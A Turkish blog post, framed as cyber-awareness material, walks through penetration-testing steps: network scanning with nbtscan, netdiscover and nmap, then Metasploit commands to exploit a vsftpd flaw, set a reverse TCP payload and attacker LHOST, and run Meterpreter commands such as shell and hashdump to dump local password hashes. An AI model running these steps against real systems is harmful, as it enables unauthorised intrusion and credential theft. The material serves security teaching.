Site Overlay

1. SİBER GÜVENLİK – HEDEF BELİRLEME

SİBER GÜVENLİK – HEDEF BELİRLEME
Bu içerik siber farkındalık sağlamak için hazırlanmıştır kötü amaçlı kullanımdan sayfamız sorumlu tutulamaz.

Dijital ortamda sızma gerçekleştirilecek sistem ve yazılımların belirlenmesidir. Hedef belirleme işlemi tamamlandıktan sonra sırasıyla aşağıda araçlar kullanılarak ilerlenmelidir.

3. TARAMA YAPMA

4. YETKİ YÜKSELTME

  1. NBTSCAN

Ağdaki cihazları tarama komutu ( gizli bir tarama ağdaki cihazda çok fazla iz bırakmaz ağı harekete geçirmez)

  1. NETDISCOVER

Ağdaki tüm IP bloklarını tarıyor ve üretici isimlerini de veriyor örneğin HP cihaz.

  1. NMAP

Tüm IP, Port, Program, İşletim sistemi ve zafiyetleri tarar.

5. METASPLOIT KULLANMA

Metasploit zafiyet kütüphanesidir.

Terminali açın:

Komutlar ve anlamları

msfconsole			konsolu açar.
search vsftp                    VSTP zafiyetine sızma exploitlerini gösterir.
use 1                           Üsteki komutu basınca hangi exploit kullanılacaksa onun numarası yazılır.
show options			Exploit bizden istediği zorunlu alanları gösterir.
set RHOSTS 192.168.8.173	Exploitin zorunlu olarak istediği ayarları SET etmek için.
exploit				Makineni içine girmek için son komut.


Eğer payload hatası verirse veya payload ihtiyaçı varsa

show payloads			Makine içinde var olan tüm payload listeler
set payload 6			Yeni paylodlar elecek Reverse TCP olanı seçelim.
show options			Neye ihtiyacı varsa o değeri verelim LHOSTS isteyecektir.
set LHOST 192.168.8.190		Kendi IP adresini yaz veya TAB a bas otomatik gelir.
exploit				İçeriye sızma.


LHOST				Saldırı yapacak cihazın IP adresi
RHOST				Saldırı yapılacka cihazın IP adresi
LPORT 				Saldırı için kullanılacak PORT

6. SIZMA SONRASI ÇALIŞTIRILABİLECEK TEMEL KOMUTLAR

id				Bağlandıktan sonra kim olduğunu gösterir
whoami				Bağlandıktan sonra kim olduğunu gösterir

7. PAYLOAD METERPRETER NEDİR

Meterpreter sizma işleminde kullanılan araçlar ve yazılım parcacıklarıdır ve bir payload’dır.

Komutlar:

help
shell
hashdump		Local userların HASH kayıtlarını gösterir.

Arif Akyüz Sistem Network Yöneticisi ve Siber Güvenlik Uzmanı
Arif Akyüz Sistem Network Yöneticisi ve Siber Güvenlik Uzmanı

Arif Akyüz
Bilgi Teknolojileri
Sistem Network Yöneticisi
ve Siber Güvenlik Uzmanı
[email protected]

Generic selectors
Exact matches only
Search in title
Search in content
Post Type Selectors
© 2024 Arif Akyüz. Tüm Hakları Saklıdır. Gizlilik politikası
Yasal Uyarı: Bu sitede yer alan makaleler bilgi amaçlıdır ve hatalar içerebilir. Site sahibi, bu bilgilerin kullanımı sonucunda oluşabilecek zararlardan sorumlu tutulamaz.